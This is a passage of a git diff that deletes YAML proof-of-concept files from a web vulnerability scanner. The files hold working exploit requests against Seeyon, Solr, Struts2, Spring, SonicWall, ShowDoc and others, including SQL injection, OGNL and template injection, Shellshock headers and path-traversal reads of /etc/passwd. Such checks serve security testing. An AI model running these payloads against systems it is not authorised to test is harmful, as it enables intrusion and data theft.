- author: x1n9Qi8
- Affected Version: "Sangfor EDR 3.2.17R1/3.2.21"
- links:
- - https://www.cnblogs.com/0day-li/p/13650452.html
diff --git a/WebScan/pocs/sangfor-edr-tool-rce.yml b/WebScan/pocs/sangfor-edr-tool-rce.yml
deleted file mode 100644
index 5a97ff7..0000000
--- a/WebScan/pocs/sangfor-edr-tool-rce.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-sangfor-edr-tool-rce
-set:
- r1: randomLowercase(8)
- r2: randomLowercase(8)
-rules:
- - method: GET
- path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}"
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
- author: cookie
- links:
- - https://edr.sangfor.com.cn/
diff --git a/WebScan/pocs/seeyon-a6-employee-info-leak.yml b/WebScan/pocs/seeyon-a6-employee-info-leak.yml
deleted file mode 100644
index b655ab7..0000000
--- a/WebScan/pocs/seeyon-a6-employee-info-leak.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-seeyon-a6-employee-info-leak
-rules:
- - method: GET
- path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
- expression:
- response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
-detail:
- author: sakura404x
- version: 致远A6
- links:
- - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
\ No newline at end of file
diff --git a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml b/WebScan/pocs/seeyon-a6-test-jsp-sql.yml
deleted file mode 100644
index fde5f2a..0000000
--- a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-seeyon-a6-test-jsp-sql
-set:
- rand: randomInt(200000000, 210000000)
-rules:
- - method: GET
- path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
- expression:
- response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
-detail:
- author: sakura404x
- version: 致远A6
- links:
- - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md
\ No newline at end of file
diff --git a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml
deleted file mode 100644
index 92ce028..0000000
--- a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-seeyon-ajax-unauthorized-access
-rules:
- - method: GET
- path: /seeyon/thirdpartyController.do.css/..;/ajax.do
- expression: |
- response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
- - method: GET
- path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
- expression: |
- response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
-
-detail:
- author: x1n9Qi8
- links:
- - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- - https://buaq.net/go-53721.html
diff --git a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml
deleted file mode 100644
index f6373ff..0000000
--- a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-seeyon-cnvd-2020-62422-readfile
-rules:
- - method: GET
- path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
- follow_redirects: false
- expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
-detail:
- author: Aquilao(https://github.com/Aquilao)
- info: seeyon readfile(CNVD-2020-62422)
- links:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
diff --git a/WebScan/pocs/seeyon-session-leak.yml b/WebScan/pocs/seeyon-session-leak.yml
deleted file mode 100644
index 4722203..0000000
--- a/WebScan/pocs/seeyon-session-leak.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-seeyon-session-leak
-rules:
- - method: GET
- path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
- expression:
- response.status == 200 && response.body.bcontains(b"\r\n\r\n")
-detail:
- author: sakura404x
- links:
- - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md
\ No newline at end of file
diff --git a/WebScan/pocs/seeyon-setextno-jsp-sql.yml b/WebScan/pocs/seeyon-setextno-jsp-sql.yml
deleted file mode 100644
index 84b6acb..0000000
--- a/WebScan/pocs/seeyon-setextno-jsp-sql.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-seeyon-setextno-jsp-sql
-set:
- rand: randomInt(200000000, 210000000)
-rules:
- - method: GET
- path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23
- expression:
- response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
-detail:
- author: sakura404x
- version: 致远A6
- links:
- - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md
\ No newline at end of file
diff --git a/WebScan/pocs/seeyon-unauthoried.yml b/WebScan/pocs/seeyon-unauthoried.yml
deleted file mode 100644
index a0777ec..0000000
--- a/WebScan/pocs/seeyon-unauthoried.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-seeyon-unauthoried
-rules:
- - method: POST
- path: "/seeyon/thirdpartyController.do"
- expression: "true"
- body: |
- method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
- search: >-
- JSESSIONID=(?P.+?)
- - method: GET
- path: "/seeyon/main.do"
- headers:
- Cookie: JSESSIONID={{session}}
- expression: |
- response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户")
-detail:
- author: whami-root(https://github.com/whami-root)
- links:
- - https://github.com/whami-root
\ No newline at end of file
diff --git a/WebScan/pocs/showdoc-uploadfile.yml b/WebScan/pocs/showdoc-uploadfile.yml
deleted file mode 100644
index 0921919..0000000
--- a/WebScan/pocs/showdoc-uploadfile.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-showdoc-uploadfile
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
-rules:
- - method: POST
- path: /index.php?s=/home/page/uploadImg
- headers:
- Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633"
- follow_redirects: false
- body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n\n----------------------------835846770881083140190633--"
- expression: |
- response.status == 200 && response.body.bcontains(b"success")
- search: |
- (?P\d{4}-\d{2}-\d{2})\\/(?P[a-f0-9]+\.php)
- - method: GET
- path: /Public/Uploads/{{date}}/{{file}}
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(r2))
-detail:
- author: White(https://github.com/WhiteHSBG)
- Affected Version: "showdoc <= 2.8.6"
- links:
- - https://github.com/star7th/showdoc/pull/1059
\ No newline at end of file
diff --git a/WebScan/pocs/solr-cve-2019-0193.yml b/WebScan/pocs/solr-cve-2019-0193.yml
deleted file mode 100644
index 28e4b75..0000000
--- a/WebScan/pocs/solr-cve-2019-0193.yml
+++ /dev/null
@@ -1,30 +0,0 @@ -name: poc-yaml-solr-cve-2019-0193 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /solr/admin/cores?wt=json - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: '"name":"(?P.*?)"' - - method: POST - path: >- - /solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}*{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E - headers: - Content-Type: text/html - body: |- - - - - - - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fnmsd(https://github.com/fnmsd) - solr_version: '<8.1.12' - vulnpath: '/solr/{{core}}/dataimport' - description: 'Apache Solr DataImportHandler Remote Code Execution Vulnerability(CVE-2019-0193)' - links: - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 
diff --git a/WebScan/pocs/solr-fileread1.yml b/WebScan/pocs/solr-fileread1.yml
deleted file mode 100644
index 0b92afd..0000000
--- a/WebScan/pocs/solr-fileread1.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-solr-fileread1
-rules:
- - method: GET
- path: "/solr/admin/cores?indexInfo=false&wt=json"
- expression: response.status == 200 && response.body.bcontains(b"responseHeader")
- search: >-
- "name":"(?P.+?)"
- - method: POST
- path: "/solr/{{core}}/config"
- body: |
- {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
- expression: |
- response.body.bcontains(b"responseHeader")
- - method: POST
- path: "/solr/{{core}}/debug/dump?param=ContentStreams"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- stream.url=file:///etc/passwd
- expression: |
- response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body)
-detail:
- author: whami-root(https://github.com/whami-root)
- links:
- - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186
\ No newline at end of file
diff --git a/WebScan/pocs/solr-fileread2.yml b/WebScan/pocs/solr-fileread2.yml
deleted file mode 100644
index 60def9e..0000000
--- a/WebScan/pocs/solr-fileread2.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-solr-fileread2
-rules:
- - method: GET
- path: "/solr/admin/cores?indexInfo=false&wt=json"
- expression: "true"
- search: >-
- "name":"(?P.+?)"
- - method: POST
- path: "/solr/{{core}}/config"
- body: |
- {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
- expression: |
- response.body.bcontains(b"responseHeader")
- - method: POST
- path: "/solr/{{core}}/debug/dump?param=ContentStreams"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- stream.url=file:///c://windows/win.ini
- expression: |
- response.status == 200 && response.body.bcontains(b"for 16-bit app support")
-detail:
- author: whami-root(https://github.com/whami-root)
- links:
- - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186
\ No newline at end of file
diff --git a/WebScan/pocs/solr-velocity-template-rce.yml b/WebScan/pocs/solr-velocity-template-rce.yml
deleted file mode 100644
index 4529340..0000000
--- a/WebScan/pocs/solr-velocity-template-rce.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-name: poc-yaml-solr-velocity-template-rce
-set:
- r1: randomInt(20000, 40000)
- r2: randomInt(20000, 40000)
-rules:
- - method: GET
- path: "/solr/admin/cores?wt=json"
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"responseHeader")
- search: |
- "name":"(?P[^"]+)"
- - method: POST
- path: >-
- /solr/{{core}}/config
- headers:
- Content-Type: application/json
- body: |-
- {
- "update-queryresponsewriter": {
- "startup": "test",
- "name": "velocity",
- "class": "solr.VelocityResponseWriter",
- "template.base.dir": "",
- "solr.resource.loader.enabled": "true",
- "params.resource.loader.enabled": "true"
- }
- }
- expression: response.status == 200
- - method: GET
- path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{r1}}%20*%20{{r2}})%24c"
- follow_redirects: false
- expression: response.body.bcontains(bytes(string(r1 * r2)))
-detail:
- author: Loneyer
- description: 'Apache Solr RCE via Velocity template'
- links:
- - https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
- - https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2
diff --git a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml
deleted file mode 100644
index 4b00104..0000000
--- a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-sonicwall-ssl-vpn-rce
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(1140000, 1144800)
-rules:
- - method: GET
- path: /cgi-bin/jarrewrite.sh
- follow_redirects: false
- headers:
- X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
-detail:
- author: sharecast
- links:
- - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml
deleted file mode 100644
index db481ae..0000000
--- a/WebScan/pocs/spring-actuator-heapdump-file.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-spring-actuator-heapdump-file
-rules:
- - method: HEAD
- path: /actuator/heapdump
- follow_redirects: true
- expression: |
- response.status == 200 && response.content_type.contains("application/octet-stream")
-detail:
- author: AgeloVito
- info: spring-actuator-heapdump-file
- links:
- - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/spring-cloud-cve-2020-5405.yml b/WebScan/pocs/spring-cloud-cve-2020-5405.yml
deleted file mode 100644
index f11a403..0000000
--- a/WebScan/pocs/spring-cloud-cve-2020-5405.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-spring-cloud-cve-2020-5405
-rules:
- - method: GET
- path: >-
- /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
- follow_redirects: true
- expression: |
- response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit."))
-
-detail:
- version: <= 2.1.6, 2.2.1
- author: kingkk(https://www.kingkk.com/)
- links:
- - https://pivotal.io/security/cve-2020-5405
- - https://github.com/spring-cloud/spring-cloud-config
\ No newline at end of file
diff --git a/WebScan/pocs/spring-cloud-cve-2020-5410.yml b/WebScan/pocs/spring-cloud-cve-2020-5410.yml
deleted file mode 100644
index 026b337..0000000
--- a/WebScan/pocs/spring-cloud-cve-2020-5410.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-spring-cloud-cve-2020-5410
-rules:
- - method: GET
- path: >-
- /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
- expression: |
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: Soveless(https://github.com/Soveless)
- Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9"
- links:
- - https://xz.aliyun.com/t/7877
\ No newline at end of file
diff --git a/WebScan/pocs/spring-cve-2016-4977.yml b/WebScan/pocs/spring-cve-2016-4977.yml
deleted file mode 100644
index 5df7d07..0000000
--- a/WebScan/pocs/spring-cve-2016-4977.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-spring-cve-2016-4977
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
-rules:
- - method: GET
- path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test
- follow_redirects: false
- expression: >
- response.body.bcontains(bytes(string(r1 * r2)))
-detail:
- Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)"
- author: hanxiansheng26(https://github.com/hanxiansheng26)
- links:
- - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977
diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml
deleted file mode 100644
index 148930d..0000000
--- a/WebScan/pocs/spring-heapdump-file.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-spring-heapdump-file
-rules:
- - method: HEAD
- path: /heapdump
- follow_redirects: true
- expression: |
- response.status == 200 && response.content_type.contains("application/octet-stream")
-detail:
- author: AgeloVito
- info: spring-heapdump-file
- links:
- - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml
deleted file mode 100644
index 5ddda4f..0000000
--- a/WebScan/pocs/springboot-env-unauth.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: poc-yaml-springboot-env-unauth
-rules:
- - method: GET
- path: /env
- expression: |
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
-detail:
- links:
- - https://github.com/LandGrey/SpringBootVulExploit
diff --git a/WebScan/pocs/springboot-env-unauth2.yml b/WebScan/pocs/springboot-env-unauth2.yml
deleted file mode 100644
index 6a78661..0000000
--- a/WebScan/pocs/springboot-env-unauth2.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: poc-yaml-springboot-env-unauth
-rules:
- - method: GET
- path: /actuator/env
- expression: |
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
-detail:
- links:
- - https://github.com/LandGrey/SpringBootVulExploit
diff --git a/WebScan/pocs/springcloud-cve-2019-3799.yml b/WebScan/pocs/springcloud-cve-2019-3799.yml
deleted file mode 100644
index 821028f..0000000
--- a/WebScan/pocs/springcloud-cve-2019-3799.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-springcloud-cve-2019-3799
-rules:
- - method: GET
- path: >-
- /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd
- follow_redirects: true
- expression: |
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-
-detail:
- version: <2.1.2, 2.0.4, 1.4.6
- author: Loneyer
- links:
- - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799
diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml
deleted file mode 100644
index d2dc423..0000000
--- a/WebScan/pocs/struts2-045-1.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-struts2_045-1
-set:
- r1: randomInt(800, 1000)
- r2: randomInt(800, 1000)
-rules:
- - method: GET
- path: /
- headers:
- Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
- follow_redirects: true
- expression: |
- "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
-detail:
- author: shadown1ng(https://github.com/shadown1ng)
-
diff --git a/WebScan/pocs/struts2-045-2.yml b/WebScan/pocs/struts2-045-2.yml
deleted file mode 100644
index 18769e6..0000000
--- a/WebScan/pocs/struts2-045-2.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-struts2_045-2
-rules:
- - method: GET
- path: /
- headers:
- Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}"
- follow_redirects: true
- expression: |
- response.body.bcontains(b"struts2_security_check")
-detail:
- author: shadown1ng(https://github.com/shadown1ng)
-
diff --git a/WebScan/pocs/struts2-046-1.yml b/WebScan/pocs/struts2-046-1.yml
deleted file mode 100644
index f0ec629..0000000
--- a/WebScan/pocs/struts2-046-1.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-struts2_046-1
-set:
- r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
-rules:
- - method: POST
- path: /
- headers:
- Content-Type: multipart/form-data; boundary=---------------------------
- follow_redirects: true
- body: |
- {{r1}}
- expression: |
- response.body.bcontains(b"struts2_security_check")
-detail:
- author: shadown1ng(https://github.com/shadown1ng)
-
diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml
deleted file mode 100644
index 5971c53..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No1.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth1
-rules:
- - method: GET
- path: /swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml
deleted file mode 100644
index a3f663e..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No2.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth2
-rules:
- - method: GET
- path: /api/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml
deleted file mode 100644
index 66e81f1..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No3.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth3
-rules:
- - method: GET
- path: /service/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml
deleted file mode 100644
index e109fc9..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No4.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth4
-rules:
- - method: GET
- path: /web/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml
deleted file mode 100644
index f111855..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No5.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth5
-rules:
- - method: GET
- path: /swagger/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml
deleted file mode 100644
index 3f18e6e..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No6.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth6
-rules:
- - method: GET
- path: /actuator/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml
deleted file mode 100644
index 2e130c9..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No7.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui-unauth7
-rules:
- - method: GET
- path: /libs/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml
deleted file mode 100644
index 33a63f4..0000000
--- a/WebScan/pocs/swagger-ui-unauth-No8.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-swagger-ui8
-rules:
- - method: GET
- path: /template/swagger-ui.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
-detail:
- author: AgeloVito
- links:
- - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/thinkadmin-v6-readfile.yml b/WebScan/pocs/thinkadmin-v6-readfile.yml
deleted file mode 100644
index 37755bf..0000000
--- a/WebScan/pocs/thinkadmin-v6-readfile.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-thinkadmin-v6-readfile
-rules:
- - method: GET
- path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34
- follow_redirects: true
- expression: |
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg"))
-detail:
- author: 0x_zmz(github.com/0x-zmz)
- info: thinkadmin-v6-readfile By 0x_zmz
- links:
- - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw
- - https://github.com/0x-zmz
diff --git a/WebScan/pocs/thinkcmf-lfi.yml b/WebScan/pocs/thinkcmf-lfi.yml
deleted file mode 100644
index 3b56650..0000000
--- a/WebScan/pocs/thinkcmf-lfi.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-thinkcmf-lfi
-
-rules:
- - method: GET
- path: "/?a=display&templateFile=README.md"
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README")))
-
-detail:
- author: JerryKing
- ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2
- links:
- - https://www.freebuf.com/vuls/217586.html
diff --git a/WebScan/pocs/thinkcmf-write-shell.yml b/WebScan/pocs/thinkcmf-write-shell.yml
deleted file mode 100644
index 5527f44..0000000
--- a/WebScan/pocs/thinkcmf-write-shell.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-name: poc-yaml-thinkcmf-write-shell
-set:
- r: randomInt(10000, 20000)
- r1: randomInt(1000000000, 2000000000)
-rules:
- - method: GET
